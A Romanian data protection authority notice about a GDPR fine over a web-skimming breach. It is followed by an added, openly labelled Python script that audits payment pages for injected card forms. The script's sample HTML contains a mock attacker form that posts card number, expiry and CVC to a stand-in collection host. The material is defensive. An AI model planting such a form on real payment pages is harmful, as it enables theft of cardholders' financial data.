09.12.2022
Sanction for the GDPR infringement
In November 2022 the National Supervisory Authority concluded an investigation of the controller Casa Rusu SRL and found infringements of Article 25 paragraph (1), Article 32 paragraph (1) letters b) and d) and Article 32 paragraph (2) of Regulation (EU) 2016/679.
The controller was therefore fined Lei 9,883.60 (the equivalent of EUR 2,000).
The investigation was opened following a personal data breach notification submitted by Casa Rusu SRL under Article 33 of Regulation (EU) 2016/679.
The investigation established that the security breach occurred because an unauthorized form had been inserted into the online payment section of the website owned by the controller, through which the banking data on clients' credit cards were collected.
This breach led to unauthorized access to and disclosure of the personal data being processed, namely the first name and last name of the card holder, the card number, the expiry date and the CVC code.
It was found that the controller Casa Rusu SRL did not take adequate technical and organizational measures, either at the time the means of processing were determined or at the time of the processing itself. It was also found that the controller did not test, assess and periodically verify the effectiveness of the technical and organizational measures intended to ensure the security of the processing and to implement the data protection principles effectively.
Consequently, on the basis of Article 58 paragraph (2) of Regulation (EU) 2016/679, the controller was also ordered to take the corrective measure of reviewing and updating the technical and organizational measures implemented following its assessment of the risk to the rights and freedoms of individuals, including the procedures regarding electronic communication, so that similar incidents of unauthorized disclosure of the personal data processed are avoided.
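The incident described above, a form injected into a merchant's payment page that siphons card data to a third party, is the pattern commonly known as web skimming. The decision faults the controller for not periodically verifying its security measures; the script below is an added example of what such a check can look like, and is not code from the ANSPDCP decision or from Casa Rusu SRL. It parses a payment page, inventories every form that collects card-like fields, and flags any form whose action posts to a host outside an approved allow-list. The allow-list, the field names and the sample HTML (including the injected form) are constructed for the demonstration.

```python
"""Periodic integrity check of an online payment page for injected card forms.

Added example, not part of the regulator's decision. It compares the forms on a
payment page against an allow-list of legitimate destinations and reports any
form that collects card data but posts it somewhere else.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed allow-list: hosts to which the merchant's forms may legitimately post
# (the shop itself and its payment service provider). Constructed for the demo.
ALLOWED_FORM_HOSTS = {"shop.example", "psp.example"}

# Field names that indicate card data is being collected (lower-cased match).
CARD_FIELDS = {"cardnumber", "card_number", "pan", "cvc", "cvv",
               "expiry", "exp_month", "exp_year"}


class FormCollector(HTMLParser):
    """Collects each <form> with its action and the names of its <input>s."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "fields": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            name = (a.get("name") or a.get("id") or "").lower()
            if name:
                self._current["fields"].append(name)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_payment_page(html, page_host, allowed_hosts=ALLOWED_FORM_HOSTS):
    """Return a list of findings, one per form that collects card fields and
    posts to a host that is not on the allow-list. An empty list means the
    page's card-collecting forms all go where they are supposed to."""
    parser = FormCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        # A relative action (e.g. "/checkout") posts back to the page's own host.
        host = urlparse(form["action"]).hostname or page_host
        card_fields = sorted(set(form["fields"]) & CARD_FIELDS)
        if card_fields and host not in allowed_hosts:
            findings.append({"action": form["action"], "host": host,
                             "card_fields": card_fields})
    return findings


# Constructed sample page: the legitimate PSP form, a harmless newsletter form,
# and a second card form injected by an attacker that posts to an unknown host.
SAMPLE_PAGE = """
<html><body>
<form id="pay" method="post" action="https://psp.example/pay">
  <input name="cardnumber"><input name="expiry"><input name="cvc">
</form>
<form method="post" action="/newsletter"><input name="email"></form>
<form method="post" action="https://cdn-stat.example/collect">
  <input name="cardnumber"><input name="expiry"><input name="cvc">
</form>
</body></html>
"""


def run_sample_audit():
    """Audit the constructed sample page as if served from shop.example."""
    return audit_payment_page(SAMPLE_PAGE, "shop.example")


if __name__ == "__main__":
    for finding in run_sample_audit():
        print("SUSPICIOUS FORM:", finding)
```

Run against a live page on a schedule (and after every deployment), with any finding treated as an incident rather than a warning. A form inventory only catches skimmers that use an HTML form; a skimmer implemented as an injected script that reads the fields and exfiltrates them with its own request needs complementary controls such as a strict Content-Security-Policy with reporting and integrity monitoring of the page's scripts.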
Legal and Communication Department
A.N.S.P.D.C.P.